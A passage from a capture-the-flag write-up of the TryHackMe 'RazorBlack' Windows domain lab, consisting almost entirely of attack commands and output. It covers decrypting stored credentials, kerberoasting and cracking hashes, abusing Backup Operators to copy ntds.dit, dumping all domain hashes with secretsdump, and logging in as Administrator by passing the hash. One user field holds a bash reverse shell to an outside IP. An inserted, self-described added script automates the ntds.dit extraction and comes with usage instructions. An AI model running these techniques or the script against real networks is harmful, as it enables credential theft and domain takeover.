<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009db56a0543f441469fc81aadb02945d20000000002000000000003660000c000000010000000069a026f82c590fa867556fe4495ca870000000004800000a0000000100000003b5bf64299ad06afde3fc9d6efe72d35500000002828ad79f53f3f38ceb3d8a8c41179a54dc94cab7b17ba52d0b9fc62dfd4a205f2bba2688e8e67e5cbc6d6584496d107b4307469b95eb3fdfd855abe27334a5fe32a8b35a3a0b6424081e14dc387902414000000e6e36273726b3c093bbbb4e976392a874772576d</SS>
</Props>
</Obj>
</Objs>
Some googling brings us to the fountain of knowledge that is stackoverflow and a method to import this XML using powershell
*Evil-WinRM* PS C:\Users\lvetrova> $credential = Import-CliXml -Path 'lvetrova.xml'
*Evil-WinRM* PS C:\Users\lvetrova> echo $credential
UserName Password
-------- --------
Your Flag is here => System.Security.SecureString
We should be able to decode the SecureString now with this approach (the exported password is DPAPI-protected to the account that ran Export-CliXml, so it decrypts for any process running as lvetrova on this host)
*Evil-WinRM* PS C:\Users\lvetrova> $ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($credential.password)
*Evil-WinRM* PS C:\Users\lvetrova> $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($ptr)
*Evil-WinRM* PS C:\Users\lvetrova> $result
`REDACTED`
And we’ve got the flag, #5: REDACTED
If we drop back to c:\users now we can find a new, previously undiscovered user, xyan1d3, which we’ll add to our list of known usernames
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/25/2021 1:25 PM Administrator
d----- 2/25/2021 10:16 AM lvetrova
d-r--- 2/23/2021 6:21 AM Public
d----- 2/25/2021 10:20 AM twilliams
d----- 2/25/2021 9:34 AM xyan1d3
Let’s see what Ljudmila can do, do we have any admin rights as this user?
*Evil-WinRM* PS C:\Users> net user lvetrova
User name lvetrova
Full Name Ljudmila Vetrova
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 8:19:35 AM
Password expires Never
Password changeable 2/23/2021 8:19:35 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/15/2021 11:05:29 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Ok, now that we have a confirmed hash for Ljudmila, let’s try kerberoasting to see if we can find any more; again the impacket tools rise to the occasion
rob:RazorBlack/ $ impacket-GetUserSPNs -dc-ip 10.10.10.10 raz0rblack.thm/lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile kerb.hashes
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- ------- ---------------------------------------------------------- -------------------------- --------- ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111 xyan1d3 CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm 2021-02-23 15:17:17.715160 <never>
This was a little tricky, we only had the NTLM hash from earlier and this command would not work. Reading the help in a little more detail showed it was expecting LMHASH:NTHASH. Simply duplicating the hash we had and supplying it twice was an effective way around (the empty LM value aad3b435b51404eeaad3b435b51404ee seen in every secretsdump line above would serve as the first half just as well)
Anyway, now we have the hash for xyan1d3, we can use john again to try and crack it
rob:RazorBlack/ $ john kerb.hashes -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
`REDACTED` (?)
1g 0:00:00:03 DONE (2021-07-22 16:01) 0.2923g/s 2592Kp/s 2592Kc/s 2592KC/s cydweli..cy2802341
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And we got #6, REDACTED
Xyan1d3
We can now login to see if we can get the flag for this user too
rob:evil-winrm/ (master) $ ./evil-winrm.rb -i 10.10.10.10 -u xyan1d3 -p cyanide9amine5628
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> cd ..
*Evil-WinRM* PS C:\Users\xyan1d3> ls
Directory: C:\Users\xyan1d3
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 9:34 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 9:33 AM 1826 xyan1d3.xml
Alright, we seem to have found another stored secure credentials file, let’s try the same technique again to decode it
*Evil-WinRM* PS C:\Users\xyan1d3> $credential = Import-CliXml -Path 'xyan1d3.xml'
*Evil-WinRM* PS C:\Users\xyan1d3> $ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($credential.password)
*Evil-WinRM* PS C:\Users\xyan1d3> $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($ptr)
*Evil-WinRM* PS C:\Users\xyan1d3> $result
LOL here it is -> REDACTED
Success, we’ve found flag #7: REDACTED
A little enumeration shows us that xyan1d3 can list the Administrator’s home folder
*Evil-WinRM* PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
--snip--
-a---- 2/25/2021 1:08 PM 290 cookie.json
-a---- 2/25/2021 1:12 PM 2512 root.xml
This shows us a couple of interesting files, but we don’t have permissions sufficient to view them
Let’s check now what groups, and therefore permissions, the user xyan1d3 has
*Evil-WinRM* PS C:\Users\xyan1d3> net user xyan1d3
User name xyan1d3
Full Name bash -i >&. /dev/tcp/10.8.156.189/8888 0>&1
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 8:17:17 AM
Password expires Never
Password changeable 2/23/2021 8:17:17 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
The only difference vs the same information on Ljudmila is that xyan1d3 is also a member of the Backup Operators group. Some googling finds us some info on how this might get us elevated privileges:
For your information, a member of the Backup operators group can:
Can back up and restore files regardless of the permissions that protect those files
Can back up system state
Can interactively logon (RDP excluded) on all servers (including DC)
Can logon to shutdown a server
A little more searching finds us a handy guide to a number of Windows exploits, including how to abuse the Backup Operators group
First we make a script and transfer it to the target
*Evil-WinRM* PS C:\Users\xyan1d3> type script.txt
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
And now we execute that script to make a backup
*Evil-WinRM* PS C:\Users\xyan1d3> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: HAVEN-DC, 7/22/2021 8:43:42 AM
-> set context persistent nowriters
-> set metadata c:\windows\system32\spool\drivers\color\example.cab
-> set verbose on
-> begin backup
-> add volume c: alias mydrive
-> create
Alias mydrive for shadow ID {9b012e1a-01a0-4687-aea0-26e348b9d3fc} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {45bbf34b-0e51-41a7-a6e4-e806fb991406} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis2834.tmp into .cab file example.cab
Querying all shadow copies with the shadow copy set ID {45bbf34b-0e51-41a7-a6e4-e806fb991406}
* Shadow copy ID = {9b012e1a-01a0-4687-aea0-26e348b9d3fc} %mydrive%
- Shadow copy set: {45bbf34b-0e51-41a7-a6e4-e806fb991406} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{115c1f55-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 7/22/2021 8:43:46 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: HAVEN-DC.raz0rblack.thm
- Service machine: HAVEN-DC.raz0rblack.thm
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %mydrive% w:
-> %mydrive% = {9b012e1a-01a0-4687-aea0-26e348b9d3fc}
The shadow copy was successfully exposed as w:\.
-> end backup
->
Ok, so far so good it seems!
Next we want to clone the repo mentioned and transfer the dlls to the target. With this done we continue
*Evil-WinRM* PS C:\Users\xyan1d3> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\xyan1d3> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\xyan1d3> Get-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\xyan1d3> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\xyan1d3> Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\xyan1d3\ntds.dit -Overwrite
*Evil-WinRM* PS C:\Users\xyan1d3> reg save HKLM\SYSTEM c:\users\xyan1d3\system.hive
The operation completed successfully.
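The same extraction as one reproducible script, added here as an example and not part of the original writeup. It swaps the third-party SeBackupPrivilege DLL cmdlets for the built-in robocopy /B (backup mode, which opens files under SeBackupPrivilege), writes the diskshadow script to a file because diskshadow cannot be driven interactively over WinRM, and cleans up the persistent shadow afterwards. The drop directory, the w: drive letter and the metadata .cab path are assumptions taken from the session above.

```powershell
# Added example (not from the original writeup): SeBackupPrivilege shadow-copy
# extraction of ntds.dit + SYSTEM using only built-in tools
# (diskshadow.exe, robocopy.exe /B, reg.exe). Assumed values below.
$workDir  = 'C:\Users\xyan1d3'                                        # assumed writable drop dir
$exposeAs = 'w:'                                                      # assumed free drive letter
$metaCab  = 'C:\Windows\System32\spool\drivers\color\example.cab'     # world-writable by default

# 1. The privilege must be listed for the token; it may show as Disabled,
#    robocopy /B enables it itself when opening files in backup mode.
if (-not (whoami /priv | Select-String 'SeBackupPrivilege')) {
    throw 'SeBackupPrivilege not held by this token; technique will not work.'
}

# 2. diskshadow /s needs a script file. %mydrive% is the alias diskshadow sets.
$shadowScript = @"
set context persistent nowriters
set metadata $metaCab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% $exposeAs
end backup
"@
$scriptPath = Join-Path $workDir 'script.txt'
Set-Content -Path $scriptPath -Value $shadowScript -Encoding ASCII   # plain ASCII, no BOM

# 3. Create and expose the shadow copy of C: as w:.
diskshadow.exe /s $scriptPath

# 4. Copy ntds.dit out of the shadow. /B = backup mode; the ACL on the live
#    NTDS folder is bypassed because the read happens under SeBackupPrivilege.
#    robocopy returns non-zero on success (1 = files copied), so test the file instead.
robocopy "$exposeAs\Windows\NTDS" $workDir ntds.dit /B /NP /NJH /NJS | Out-Null
if (-not (Test-Path (Join-Path $workDir 'ntds.dit'))) { throw 'ntds.dit copy failed' }

# 5. SYSTEM hive: holds the boot key that decrypts the PEK inside ntds.dit.
reg.exe save HKLM\SYSTEM (Join-Path $workDir 'system.hive') /y

# 6. Remove only the shadow we exposed. 'delete shadows all' would also wipe
#    any legitimate VSS snapshots on the host, so delete by exposure instead.
$cleanupPath = Join-Path $workDir 'cleanup.txt'
Set-Content -Path $cleanupPath -Value "delete shadows exposed $exposeAs" -Encoding ASCII
diskshadow.exe /s $cleanupPath
Remove-Item $scriptPath, $cleanupPath

# What is left to download: ntds.dit and system.hive.
Get-ChildItem (Join-Path $workDir 'ntds.dit'), (Join-Path $workDir 'system.hive')
```

Run it from the Evil-WinRM session of an account in Backup Operators (or any other account holding SeBackupPrivilege); the two files it leaves in the drop directory are exactly what secretsdump's LOCAL mode needs.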
Everything seems to have gone exactly as described, let’s check if we have the files we expect
*Evil-WinRM* PS C:\Users\xyan1d3> dir
Directory: C:\Users\xyan1d3
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 9:34 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 7/22/2021 8:50 AM 16777216 ntds.dit
-a---- 7/22/2021 8:43 AM 216 script.txt
-a---- 7/22/2021 8:48 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 7/22/2021 8:48 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 7/22/2021 8:50 AM 17219584 system.hive
-a---- 2/25/2021 9:33 AM 1826 xyan1d3.xml
And we do! Now we want to transfer them back to our attack box and see if we can harvest some creds. Luckily Evil-WinRM has a built-in download function for this, so we pull both files down and head back to impacket's secretsdump, this time in LOCAL mode against the offline SYSTEM hive and ntds.dit:
rob:RazorBlack/ $ impacket-secretsdump -system system.hive -ntds ntds.dit -outputfile morehashes.hash LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xf1582a79dd00631b701d3d15e75e59f6
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f6162bb347993035d66a15417d73a667
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689931bed40ca5a2ce1218210177f0c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:26cc019045071ea8ad315bd764c4f5c6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fa3c456268854a917bd17184c85b4fd1:::
raz0rblack.thm\xyan1d3:1106:aad3b435b51404eeaad3b435b51404ee:bf11a3cbefb46f7194da2fa190834025:::
raz0rblack.thm\lvetrova:1107:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::
raz0rblack.thm\sbradley:1108:aad3b435b51404eeaad3b435b51404ee:351c839c5e02d1ed0134a383b628426e:::
raz0rblack.thm\twilliams:1109:aad3b435b51404eeaad3b435b51404ee:351c839c5e02d1ed0134a383b628426e:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ab77c0dd6f5a28b63c4ae5f0eb89ad48f3ed43d52dc42f1dca2e99d8fc9cdbbf
Administrator:aes128-cts-hmac-sha1-96:81a749369e929b7f1731489b12a49df8
Administrator:des-cbc-md5:d3b646b65bceb5c7
HAVEN-DC$:aes256-cts-hmac-sha1-96:d6b41169e02a4543b90a8c697b167948413397c30f1bf5f0199a54f387358fc6
HAVEN-DC$:aes128-cts-hmac-sha1-96:5ed5bd57484ca826e09afa6e5b944c27
HAVEN-DC$:des-cbc-md5:f71a0dc89b9d079d
krbtgt:aes256-cts-hmac-sha1-96:eed4acbdf1b6cc2b3c1aef992a8cea74d8b0c4ad5b4deecf47c57c4d9465caf5
krbtgt:aes128-cts-hmac-sha1-96:3dbbd202aa0343d1b8df99785d2befbb
krbtgt:des-cbc-md5:857a46f13e91eae3
raz0rblack.thm\xyan1d3:aes256-cts-hmac-sha1-96:6de380d21ae165f55e7520ee3c4a81417bf6a25b17f72ce119083846d89a031f
raz0rblack.thm\xyan1d3:aes128-cts-hmac-sha1-96:9f5a0114b2c18ea63a32a1b8553d4f61
raz0rblack.thm\xyan1d3:des-cbc-md5:e9a1a46223cd8975
raz0rblack.thm\lvetrova:aes256-cts-hmac-sha1-96:3809e38e24ecb746dc0d98e2b95f39fc157de38a9081b3973db5be4c25d5ad39
raz0rblack.thm\lvetrova:aes128-cts-hmac-sha1-96:3676941361afe1800b8ab5d5a15bd839
raz0rblack.thm\lvetrova:des-cbc-md5:385d6e1f1cc17fb6
raz0rblack.thm\sbradley:aes256-cts-hmac-sha1-96:ddd43169c2235d3d2134fdb2ff4182abdb029a20724e679189a755014e68bab5
raz0rblack.thm\sbradley:aes128-cts-hmac-sha1-96:7cdf6640a975c86298b9f48000047580
raz0rblack.thm\sbradley:des-cbc-md5:83fe3e584f4a5bf8
raz0rblack.thm\twilliams:aes256-cts-hmac-sha1-96:05bac51a4b8888a484e0fa1400d8f507b195c4367198024c6806d8eb401cb559
raz0rblack.thm\twilliams:aes128-cts-hmac-sha1-96:a37656829f443e3fe2630aa69af5cb5a
raz0rblack.thm\twilliams:des-cbc-md5:01e958b0ea6edf07
[*] Cleaning up...
Now we have the Administrator's NT hash. Trying to crack it gets nowhere, but we don't need the plaintext: WinRM accepts NTLM authentication, so Evil-WinRM can pass the hash directly with -H instead
rob:evil-winrm/ (master) $ ./evil-winrm.rb -i 10.10.94.232 -u administrator -H 9689931bed40ca5a2ce1218210177f0c
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Administrator
We can now have a look at those files, first the cookie.json
*Evil-WinRM* PS C:\Users\Administrator> type cookie.json
{
auth : "TG9vayB0aGlzIGlzIHlvdXIgY29va2llLgpGdW5GYWN0IDogVGhpcyBjb29raWUgY2FuIGNoYW5nZSBpdHMgb3duIGZsYXZvdXIgYXV0b21hdGljYWxseS4gVG8gdGVzdCBpdCBqdXN0IHRoaW5rIG9mIHlvdXIgZmF2b3VyaXRlIGZsYXZvdXIuCgpBbmQgc3RvcCBwdXR0aW5nICdPUiAnMSc9JzEgaW5zaWRlIGxvZ2luLnBocAoKRW5qb3kgeW91ciBDb29raWU="
}
That looks like a base64 string, let’s try decoding it
rob:RazorBlack/ $ echo "TG9vayB0aGlzIGlzIHlvdXIgY29va2llLgpGdW5GYWN0IDogVGhpcyBjb29raWUgY2FuIGNoYW5nZSBpdHMgb3duIGZsYXZvdXIgYXV0b21hdGljYWxseS4gVG8gdGVzdCBpdCBqdXN0IHRoaW5rIG9mIHlvdXIgZmF2b3VyaXRlIGZsYXZvdXIuCgpBbmQgc3RvcCBwdXR0aW5nICdPUiAnMSc9JzEgaW5zaWRlIGxvZ2luLnBocAoKRW5qb3kgeW91ciBDb29raWU=" | base64 -d
Look this is your cookie.
FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour.
And stop putting 'OR '1'='1 inside login.php
Enjoy your Cookie
Ok, just random thoughts or something relevant? Let's carry on for now and look at the root.xml file. Assuming it's the same format, let's use our previous method again
*Evil-WinRM* PS C:\Users\Administrator> $credential = Import-CliXml -Path 'root.xml'
The data is invalid.
At line:1 char:15
+ $credential = Import-CliXml -Path 'root.xml'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Import-Clixml], CryptographicException
+ FullyQualifiedErrorId : System.Security.Cryptography.CryptographicException,Microsoft.PowerShell.Commands.ImportClixmlCommand
Ahh, of course, that would be too easy! 😄
Looking at the raw contents of the file, though, they seem a little familiar: a long run of hex digits, not the DPAPI-protected blob Import-CliXml expects, which is why it threw a CryptographicException.
Those hex values all sit in the printable ASCII range, and sure enough, converting from hex gives us a message
Damn you are a genius.
But, I apologize for cheating you like this.
Here is your Root Flag
`REDACTED`
Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.
If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.
And we have the root flag in there, #8: REDACTED
Tyson
So finally now let’s go and look in Tyson Williams (twilliams) home folder
*Evil-WinRM* PS C:\users\twilliams> dir
Directory: C:\users\twilliams
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 10:18 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 10:20 AM 80 definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe
Ok then, that is obviously definitely not a flag! Let's check anyway…
At 80 bytes the file is far too small to be a real executable (the DOS stub and PE headers alone take more than that), so it is almost certainly plain text with an .exe extension. Let's look at the contents
*Evil-WinRM* PS C:\users\twilliams> type definitely*
`REDACTED`
And we got flag #9: REDACTED
Top Secret
A bit more enumeration turns up an image file in c:\program files\top secret
This gives us the final flag, #10: REDACTED
😄 Vim for the win!